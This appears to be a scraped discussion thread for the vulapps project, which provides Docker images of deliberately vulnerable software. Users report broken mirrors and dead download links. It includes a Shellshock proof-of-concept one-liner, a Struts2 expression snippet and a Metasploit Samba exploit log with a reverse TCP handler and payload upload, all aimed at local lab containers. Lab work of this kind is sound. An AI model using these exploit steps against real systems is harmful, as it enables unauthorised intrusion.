medicean / vulapps
Quickly set up various vulnerability environments
Home Page: http://vulapps.evalbug.com/
License: GNU General Public License v3.0
<@s.hidden name="redirectUri" value="%{redirectUri}" />
The value here does not display the execution result.
As in the title.
medicean/vulapps:r_redis_1: the USTC mirror does not have this one
medicean/vulapps:n_nagios_1
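medicean/vulapps:o_openssl_heartbleed: these two are extremely slow through the USTC mirror
Workaround: registry-mirror=https://2h3po24q.mirror.aliyuncs.com is very fast
Hi, the Qiniu Cloud links for several of the WordPress environments have expired, orz
A question for the author: do you have the source code for the WAR packages of Java web vulnerabilities such as your Struts2 ones?
Following the PoC here, https://seclists.org/oss-sec/2014/q3/688, run the following command in bash: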
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
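A file named echo is created in the current directory, and its content is the output of the date command,
but it does not succeed when run in the docker.io/medicean/vulapps:b_bash_shellshock2 image.
Thanks for sharing. The 048 vulnerability had only just come out and this vulnerability environment platform was already updated. Thanks, thank you.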
FROM tomcat:8-jre8
MAINTAINER [email protected]
ENV WAR_URL http://ocnf2x3pk.bkt.clouddn.com/S2-019.war
WORKDIR /tmp
RUN set -ex \
&& rm -rf /usr/local/tomcat/webapps/* \
&& chmod a+x /usr/local/tomcat/bin/*.sh \
&& wget -qO /usr/local/tomcat/webapps/ROOT.war $WAR_URL
EXPOSE 8080
Environment setup failed: the link http://ocnf2x3pk.bkt.clouddn.com/S2-019.war seems to be dead, and several others under struts2 are dead as well.
I have installed Docker and then scanned with nmap; there is no port related to AJP. I have also checked the server.xml file.
See the code in src/start.sh:
if [[ "$EMAIL_ADDR" && "$EMAIL_PASSWORD" ]]; then
sed -i "s/[email protected]/${EMAIL_ADDR}/g" /htdocs/ant-master/web/modules/mail.js
sed -i "s/email-password/${EMAIL_PASSWORD}/g" /htdocs/ant-master/web/modules/mail.js
fi
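Following your first few steps, I pulled the Docker image and got it running successfully.
It and my physical machine can also ping each other.
Now, after running it with msf, the result shows: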
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] 172.17.0.2:445 - Using location \\172.17.0.2\share\ for the path
[*] 172.17.0.2:445 - Retrieving the remote path of the share 'share'
[*] 172.17.0.2:445 - Share 'share' has server-side path '/tmp/
[*] 172.17.0.2:445 - Uploaded payload to \\172.17.0.2\share\kJJBfBuJ.so
[*] 172.17.0.2:445 - Loading the payload from server-side path /tmp/kJJBfBuJ.so using \\PIPE\/tmp/kJJBfBuJ.so...
[-] 172.17.0.2:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.17.0.2:445 - Loading the payload from server-side path /tmp/kJJBfBuJ.so using /tmp/kJJBfBuJ.so...
[-] 172.17.0.2:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
https://hub.docker.com/r/medicean/vulapps
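The password for author is written incorrectly; I tried it and it is author4wp498
I used the CVE-2017-12615 Tomcat remote code execution vulnerability and the test did not succeed; after entering the container I found that the value of readonly is true.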
I don't know how to change cookie of poc.py. Would you please tell me how to do that?
The administrator account and password are [email protected] 123456, right? Why can't I log in?
Then should I register?
Turns out I can't register either...